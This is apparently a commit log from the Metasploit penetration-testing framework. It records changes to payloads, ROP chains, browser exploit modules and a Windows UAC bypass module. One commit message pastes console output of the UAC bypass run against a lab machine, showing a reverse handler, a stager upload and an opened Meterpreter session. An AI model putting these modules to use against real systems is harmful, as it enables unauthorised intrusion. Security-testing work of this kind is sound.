ZeroChaos
ce3584194f
Merge pull request #1 from todb-r7/land-2465
...
Fix up PR #2465
2013-10-09 10:23:08 -07:00
Tod Beardsley
356263df56
Litter some more rescue nil's in there
...
I hate them but they were there when I got there.
A more sane way to deal with this should happen someday.
2013-10-09 12:17:13 -05:00
Tod Beardsley
f95da649f8
Deal with missing bins, too.
...
This could be way more DRY. At least there's a YARD-ish comment.
This fixes up https://github.com/rapid7/metasploit-framework/pull/2465
to be a more complete solution.
[SeeRM #8465 ]
2013-10-09 12:13:44 -05:00
joev
1e78c3ca1a
Add missing require to nodejs/bind payload.
2013-10-09 11:39:05 -05:00
William Vu
3cbea09cc6
Land #2492 , s/Dyn-DNS/DynDNS/
2013-10-09 10:54:43 -05:00
Tod Beardsley
c2c6422078
Correct the name of "DynDNS" (not Dyn-DNS)
2013-10-09 09:56:07 -05:00
jvazquez-r7
2073c4e6a7
Land #2489 , @mwulftange :noquotes option for CmdStagerPrintf
2013-10-09 08:29:11 -05:00
Winterspite
0acb170ee8
Bug #8419 - Added platform info missing on exploits
2013-10-08 22:41:50 -04:00
Tod Beardsley
c84e5c7443
Land #2490 , new sniffer extenstion binaries
2013-10-08 17:15:54 -05:00
OJ
0a194b203d
Updated sniffer binaries
...
These updated binaries include a packet-sniffer fix which results in
sniffing working on x86 builds of Windows 8 and Windows 8.1.
2013-10-09 07:38:54 +10:00
sinn3r
2f0120748b
Land #2487 - Mark broken tests as pending
2013-10-08 15:10:10 -05:00
sinn3r
ef48a4b385
Land #2486 - Fix error message backtrace
2013-10-08 14:55:39 -05:00
Markus Wulftange
e895a17722
Add 'no quotes' option for CmdStagerPrintf
...
Exploit developers can use the ':noquotes => true' option to avoid
single quotes surrounding the octal escapes argument.
2013-10-08 21:04:28 +02:00
Tod Beardsley
2f670a35c4
Land #2488 , ref update for ms13-080
2013-10-08 13:48:34 -05:00
sinn3r
199bd20b95
Update CVE-2013-3893's Microsoft reference
...
Official patch is out:
http://technet.microsoft.com/en-us/security/bulletin/MS13-080
2013-10-08 13:00:03 -05:00
Tod Beardsley
72a35d14f1
Mark broken tests as pending
...
These tests are broken a few different ways.
[SeeRM #8463 ]
also see: https://github.com/rapid7/metasploit-framework/pull/2477
2013-10-08 11:49:42 -05:00
David Maloney
7d0cf73af7
Fix multi-meter_inject error msg
...
Was trying to coerce the exception class
to string rather than calling .message
Results in a stacktrace.
FIXRM #8460
2013-10-08 11:11:38 -05:00
sinn3r
a5bace2425
Land #2485 - Removed extra bracket for scripts/meterpreter/vnc.rb
...
g0tmi1k's version was outdated, so I merged from my branch instead.
2013-10-08 10:17:49 -05:00
sinn3r
db92709d33
Remove extra bracket
2013-10-08 10:17:08 -05:00
jvazquez-r7
2593c06e7c
Land #2412 , @mwulftange's printf cmd stager
2013-10-08 09:08:29 -05:00
Markus Wulftange
6f7d513f6e
Another clean up and simplification of CmdStagerPrintf
2013-10-08 07:22:09 +02:00
Tod Beardsley
8b9ac746db
Land #2481 , deprecate linksys cmd exec module
2013-10-07 20:44:04 -05:00
sinn3r
c10f0253bc
Land #2472 - Clean up the way Apple Safari UXSS aux module does data collection
2013-10-07 15:47:28 -05:00
Tod Beardsley
e0ce444896
Merging release back to master
2013-10-07 15:33:16 -05:00
sinn3r
f7f6abc1dd
Land #2479 - Add Joev to the wolfpack
2013-10-07 15:30:23 -05:00
sinn3r
f4000d35ba
Use RopDb for ms13_069
...
Target tested
2013-10-07 15:24:01 -05:00
sinn3r
7222e3ca49
Use RopDb for ms13_055_canchor.
...
All targets tested.
2013-10-07 15:09:36 -05:00
sinn3r
67228bace8
Use RopDb for ie_cgenericelement_uaf.
...
All targets tested except for Vista, so additional testing will need
to be done during review.
2013-10-07 14:51:34 -05:00
Rob Fuller
aed2490536
add some output and fixing
2013-10-07 15:42:41 -04:00
Rob Fuller
75d2abc8c2
integrate some ask functionality into bypassuac
2013-10-07 15:14:54 -04:00
joev
4ba001d6dd
Put my short name to prevent conflicts.
2013-10-07 14:10:47 -05:00
joev
ec6516d87c
Deprecate misnamed module.
...
* Renames to a linux linksys module.
2013-10-07 14:06:13 -05:00
sinn3r
aea63130a4
Use RopDb for ie_cbutton_uaf.
...
All targets tested except for Vista. Will need additional testing
during review.
2013-10-07 14:03:07 -05:00
Tod Beardsley
61e02f3d79
Merge 'upstream-master' into release
...
Picks up #2480 as well.
2013-10-07 13:52:04 -05:00
jvazquez-r7
0991b72a0e
Land #2480 , @todb-r7's changes for weekly update
2013-10-07 13:19:00 -05:00
Tod Beardsley
5c5cf6dc57
Merge 'upstream-master' into release
...
Preliminary cut for release
2013-10-07 13:15:09 -05:00
Tod Beardsley
219bef41a7
Decaps Siemens (consistent with other modules)
2013-10-07 13:12:32 -05:00
Tod Beardsley
3215453522
Empty commit to trigger a close on #2476
...
If this commit lands, it'll close #2476 because it accomplishes the same
thing.
[Closes #2476 ]
2013-10-07 12:51:34 -05:00
Tod Beardsley
4266b88a20
Move author name to just 'joev'
...
[See #2476 ]
2013-10-07 12:50:04 -05:00
Tod Beardsley
ff6dec5eee
Promote joev to a first class citizen
...
[See #2476 ]
2013-10-07 12:40:43 -05:00
jvazquez-r7
8b7d241dc3
Use a named subject
2013-10-07 12:28:50 -05:00
sinn3r
e016c9a62f
Use RopDb msvcrt ROP chain. Tested all targets.
2013-10-07 12:27:43 -05:00
Tod Beardsley
293927aff0
msftidy fix for coldfusion exploit
2013-10-07 12:22:48 -05:00
jvazquez-r7
d8dba8ee58
Fix ropdb spec according to @limhoff-r7's comments
2013-10-07 09:51:21 -05:00
joev
da48565093
Add more payloads for nodejs.
...
* Adds a reverse and bind CMD payload
* Adds a bind payload (no bind_ssl for now).
2013-10-07 06:09:21 -05:00
joev
47e7a2de83
Kill stray debugger statement.
2013-10-06 19:32:22 -05:00
joev
c2a81907ba
Clean up the way Apple Safari UXSS aux module does data collection.
...
[FIXRM #7918 ]
2013-10-06 19:28:16 -05:00
jvazquez-r7
5aa3709ca2
Land #2467 , @wchen-r7's code to allow dynamic size paylods on ropdb
2013-10-06 18:18:13 -05:00
sinn3r
991e82a78a
Land #2470 - Continue to run UAC level is 0
2013-10-05 23:20:55 -05:00
trustedsec
0799766faa
Fix UAC is not enabled, no reason to run module when UAC is enabled and vulnerable
...
The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is:
Here is prior to the change on a fully patched Windows 8 machine:
msf exploit(bypassuac) > exploit
[*] Started reverse handler on 172.16.21.156:4444
[*] UAC is Enabled, checking level...
[-] UAC is not enabled, no reason to run module
[-] Run exploit/windows/local/ask to elevate
msf exploit(bypassuac) >
Here's the module when running with the most recent changes that are being proposed:
[*] Started reverse handler on 172.16.21.156:4444
[*] UAC is Enabled, checking level...
[!] Could not determine UAC level - attempting anyways...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (770048 bytes) to 172.16.21.128
[*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400
meterpreter >
With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.
2013-10-05 15:56:55 -04:00